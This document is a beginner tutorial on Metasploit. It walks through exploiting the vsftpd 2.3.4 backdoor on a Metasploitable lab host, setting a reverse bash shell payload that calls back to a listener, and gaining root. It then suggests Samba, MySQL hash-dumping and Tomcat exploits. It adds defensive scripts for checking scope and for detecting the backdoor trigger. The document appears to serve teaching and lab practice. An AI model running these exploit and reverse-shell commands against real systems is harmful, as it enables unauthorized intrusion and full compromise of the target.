
Introduction to Metasploit Framework: Your First Exploit

Learn Metasploit basics: msfconsole, setting payloads, exploits, listeners, and running your first successful attack.


Metasploit Framework is the industry-standard exploitation toolkit used by penetration testers worldwide. Rather than manually crafting exploits, Metasploit provides pre-built modules that automate attacks. For someone learning security, Metasploit is the bridge between theoretical knowledge and practical execution.

This guide walks you through launching your first exploit using Metasploit’s core component: msfconsole.

What Is Metasploit Framework?

Metasploit is a modular framework containing:

  • Exploits: Code that takes advantage of specific vulnerabilities
  • Payloads: Code executed after exploitation (reverse shells, Meterpreter)
  • Listeners: Components that catch incoming connections
  • Encoders: Tools to evade antivirus detection
  • Auxiliary modules: Network scanning, enumeration, discovery tools

The framework is free (Metasploit Community) and open-source. Professional pentests often use Metasploit Pro, but Community Edition covers 90% of learning needs.

Installation

On Kali Linux (pre-installed):

Metasploit comes with Kali but may need updating:

sudo apt update
sudo apt install metasploit-framework

Verify installation:

msfconsole --version
# Output: MetasploitFramework Community Edition 6.4.x

On other Linux systems:

Download and install from https://www.metasploit.com/download/

macOS:

brew install metasploit

Starting msfconsole

Launch the interactive Metasploit console:

msfconsole

First launch creates databases (this takes 30-60 seconds).

You’ll see:

  o=[]-----[]~|   "I tried to do my best"
  \_/|_|\_|   \     - The Mighty Metasploit
  "|"-_|_|-._|  |v6.4.0-dev
  _|_V|_V|_|-._  /
  Metasploit tip: Use 'help' to see all available commands

msf6 >

The msf6 > prompt is where you interact with the framework.

Core msfconsole Commands

Command        Purpose
-------        -------
search         Find exploits, payloads, auxiliary modules
use            Select an exploit or module
show options   Display configurable parameters
set            Configure a parameter
run / exploit  Execute the module
back           Return to main prompt
history        View command history
help           Display help documentation

Your First Exploit: VSFTPD Backdoor

VSFTPD 2.3.4 contains a deliberate backdoor. Metasploitable runs this exact version, making it perfect for learning.

Step 1: Search for the exploit

msf6 > search vsftpd

Output:

Matching Modules
================

#  Name                                  Disclosure Date  Rank  Check  Description
-  ----                                  ---------------  ----  -----  -----------
0  exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       Good  No     VSFTPD v2.3.4 Backdoor Command Execution

Step 2: Load the exploit

msf6 > use exploit/unix/ftp/vsftpd_234_backdoor

You’re now in the exploit module context:

msf6 exploit(unix/ftp/vsftpd_234_backdoor) >

Step 3: Display required options

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options

Output:

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                    yes       The target host(s)
   RPORT   21               no        The target port (default: 21)

Payload options (cmd/unix/interact):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  ---

RHOSTS is required — it’s the Remote HOST (target).

Step 4: Set the target host

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 10.0.2.5
RHOSTS => 10.0.2.5

(Replace 10.0.2.5 with your Metasploitable machine’s actual IP)

Step 5: Check payloads

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show payloads

Output:

Compatible Payloads
====================

#   Name                    Disclosure Date  Rank  Description
-   ----                    ---------------  ----  -----------
0   cmd/unix/interact       -                -     Unix Command Shell
1   cmd/unix/reverse_bash   -                -     Unix Command Shell, Reverse TCP
2   cmd/unix/reverse_netcat -                -     Unix Command Shell, Reverse TCP

The default cmd/unix/interact is fine for learning.

Step 6: Run the exploit

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run

Or:

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

Expected output:

[*] 10.0.2.5:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.0.2.5:21 - USER response: 330 Please specify the password.
[!] 10.0.2.5:21 - The server is vulnerable!
[*] Exploit completed, but no session was created.

The backdoor was triggered. Your payload (shell) should be available. In this case, we sent an “interact” payload, which may not create a visible session.

Understanding the Exploit Workflow

What just happened:

  1. Reconnaissance: Metasploit connected to FTP on port 21
  2. Fingerprinting: Identified VSFTPD version 2.3.4
  3. Exploitation: Sent the backdoor trigger (USER with smiley face)
  4. Payload execution: Executed the “interact” payload

In production pentests, you’d use a reverse shell:

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set PAYLOAD cmd/unix/reverse_bash
PAYLOAD => cmd/unix/reverse_bash

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options

This shows new required options:

Payload options (cmd/unix/reverse_bash):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.100    yes       The listen address (this machine)
   LPORT  4444             yes       The listen port

  • LHOST = Listener HOST (your Kali machine)
  • LPORT = Listener PORT (where you’ll receive the connection)

Using a Reverse Shell Payload

A reverse shell connects back to you, giving interactive command execution.

Step 1: Set the reverse payload

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set PAYLOAD cmd/unix/reverse_bash
PAYLOAD => cmd/unix/reverse_bash

Step 2: Set listener options

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set LHOST 10.0.2.4
LHOST => 10.0.2.4

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set LPORT 4444
LPORT => 4444

Step 3: Run the exploit

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

Expected output:

[*] Started reverse TCP listener on 10.0.2.4:4444
[*] 10.0.2.5:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.0.2.5:21 - USER response: 330 Please specify the password.
[!] 10.0.2.5:21 - The server is vulnerable!
[*] Sending reverse bash shell...
[*] Command shell session 1 opened (10.0.2.4:4444 -> 10.0.2.5:65296)

You’re now connected to Metasploitable!

id
# uid=0(root) gid=0(root) groups=0(root)

whoami
# root

pwd
# /

ls -la /
# Lists the root directory of Metasploitable

You’ve successfully exploited a vulnerability and gained shell access.

Key Metasploit Concepts

Exploit vs. Payload

  • Exploit: The attack code (VSFTPD backdoor trigger)
  • Payload: What happens after exploitation (reverse bash shell)

An exploit without a payload is reconnaissance only.

Handler

When using reverse shells, Metasploit automatically handles incoming connections.

[*] Started reverse TCP listener on 10.0.2.4:4444

This is the handler — it listens for the target to connect back.

Sessions

Once you have a shell, it’s a “session”:

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > sessions
Active sessions
===============

  Id  Name  Type            Information  Connection
  --  ----  ----            -----------  ----------
  1   -     shell cmd unix  -            10.0.2.4:4444 -> 10.0.2.5:65296 (10.0.2.5)

Interact with a session:

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > sessions -i 1
[*] Starting interaction with 1...

root@metasploitable:/#

Common Metasploit Workflows

Port Scanning with Metasploit

Before exploiting, use auxiliary modules for scanning:

msf6 > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) > set RHOSTS 10.0.2.5
msf6 auxiliary(scanner/portscan/tcp) > run

Vulnerability Scanning

msf6 > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 10.0.2.5
msf6 auxiliary(scanner/smb/smb_version) > run

Running Multiple Exploits

Store targets in a file:

echo "10.0.2.5" > targets.txt
echo "10.0.2.6" >> targets.txt

In msfconsole:

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS file:/home/user/targets.txt
RHOSTS => file:/home/user/targets.txt
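
A target file is where an out-of-scope address most easily slips into a run, so it is worth checking before it is handed to RHOSTS. The script below is an added example, not part of the original article; the scope range, the sample entries and the function name check_targets are assumptions chosen to match the lab addresses used here.

```python
import ipaddress

# Assumed lab scope; replace with the ranges in your written authorization.
AUTHORIZED_SCOPE = [ipaddress.ip_network("10.0.2.0/24")]

# Constructed file content: the article's two hosts plus entries that must fail.
SAMPLE_TARGETS = """\
10.0.2.5
10.0.2.6
192.168.1.20
10.0.2.0/28
10.0.0.0/8
ftp.example.com
"""

def check_targets(text, scope=AUTHORIZED_SCOPE):
    """Split target entries into (in_scope, rejected) lists.

    Accepts single addresses and CIDR blocks. Hostnames are rejected because
    what they resolve to can change between this check and the run.
    """
    in_scope, rejected = [], []
    for raw in text.splitlines():
        entry = raw.strip()
        if not entry:
            continue
        try:
            net = ipaddress.ip_network(entry, strict=False)
        except ValueError:
            rejected.append((entry, "not an IP address or CIDR block"))
            continue
        # A block is in scope only if it sits entirely inside an authorized range.
        if any(net.version == s.version and net.subnet_of(s) for s in scope):
            in_scope.append(entry)
        else:
            rejected.append((entry, "outside authorized scope"))
    return in_scope, rejected

if __name__ == "__main__":
    ok, bad = check_targets(SAMPLE_TARGETS)
    print("in scope:", ok)
    for entry, reason in bad:
        print(f"REJECTED {entry}: {reason}")
```

Only write targets.txt from the in-scope list, and treat any rejected entry as a reason to stop and re-read the authorization.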

Practical Exercises

  1. Exploit Samba on Metasploitable:

    • Search for “samba”
    • Use exploit/linux/samba/trans2open
    • Set RHOSTS to Metasploitable
    • Gain shell access
  2. Exploit MySQL:

    • Search for “mysql_login”
    • Identify default credentials (root/empty)
    • Enumerate databases
    • Dump user hashes
  3. Web application exploits:

    • Search for “tomcat”
    • Exploit JSP upload vulnerability
    • Gain RCE on Metasploitable’s Tomcat instance

Important Warnings

  • Only use on authorized systems — Metasploitable in your lab, never production
  • Keep detailed logs — Document what you exploit and how
  • Understand the exploit — Don’t just run modules blindly
  • Check for public data — Exploitation creates noise; understand IDS/IPS risks
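
The noise mentioned in the last warning is concrete for the vsftpd walkthrough above. This added example (not from the original article) scans FTP protocol logs for a USER command containing the smiley ":)" and escalates when the FTP server then connects back to the same client, as the reverse shell session did. The log and flow line formats, the sample lines and the 30-second window are constructed assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed sample data, not taken from the original article. FTP lines are
# modelled on vsftpd protocol logging; flow lines use a made-up format.
FTP_LOG = '''\
2024-05-01T10:00:01 [pid 811] FTP command: Client "10.0.2.9", "USER alice"
2024-05-01T10:02:10 [pid 812] FTP command: Client "10.0.2.4", "USER kx3:)"
2024-05-01T10:02:10 [pid 812] FTP command: Client "10.0.2.4", "PASS <password>"
2024-05-01T10:07:30 [pid 815] FTP command: Client "::ffff:10.0.2.7", "USER bob:)"
'''
FLOWS = '''\
2024-05-01T10:02:11 10.0.2.5:65296 -> 10.0.2.4:4444
2024-05-01T10:03:00 10.0.2.5:40112 -> 10.0.2.9:80
2024-05-01T10:20:00 10.0.2.5:40500 -> 10.0.2.7:4444
'''
FTP_SERVER = "10.0.2.5"  # the monitored vsftpd host (lab address from the article)

USER_RE = re.compile(r'^(\S+) \[pid \d+\] FTP command: Client "([^"]+)", "USER (.*)"$')
FLOW_RE = re.compile(r'^(\S+) ([\d.]+):(\d+) -> ([\d.]+):(\d+)$')

def smiley_logins(ftp_log):
    """Return (time, client, username) for USER commands containing ':)'."""
    hits = []
    for line in ftp_log.splitlines():
        m = USER_RE.match(line)
        if m and ":)" in m.group(3):
            client = m.group(2).replace("::ffff:", "")  # strip IPv4-mapped prefix
            hits.append((datetime.fromisoformat(m.group(1)), client, m.group(3)))
    return hits

def correlate(ftp_log, flows, server=FTP_SERVER, window=timedelta(seconds=30)):
    """Pair each trigger with connections the server opened back to that client."""
    parsed = [FLOW_RE.match(line) for line in flows.splitlines()]
    alerts = []
    for ts, client, user in smiley_logins(ftp_log):
        callbacks = [int(f.group(5)) for f in parsed if f
                     and f.group(2) == server and f.group(4) == client
                     and ts <= datetime.fromisoformat(f.group(1)) <= ts + window]
        alerts.append({"client": client, "user": user,
                       "severity": "critical" if callbacks else "high",
                       "callback_ports": callbacks})
    return alerts

if __name__ == "__main__":
    for alert in correlate(FTP_LOG, FLOWS):
        print(alert)
```

A "high" alert means the trigger was attempted; "critical" means the server also opened a connection back to the sender inside the window, which is what a successful reverse shell looks like from the network.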

Next Steps

Master Metasploit by:

  1. Exploiting every vulnerable service on Metasploitable
  2. Experimenting with different payloads (Meterpreter, ASP, PHP, etc.)
  3. Learning post-exploitation modules
  4. Practicing on legal platforms like HackTheBox and TryHackMe
  5. Reading Metasploit Framework exploit code to understand how they work

Metasploit is your bridge from learning to doing. Master it, and exploitation becomes systematic and repeatable.
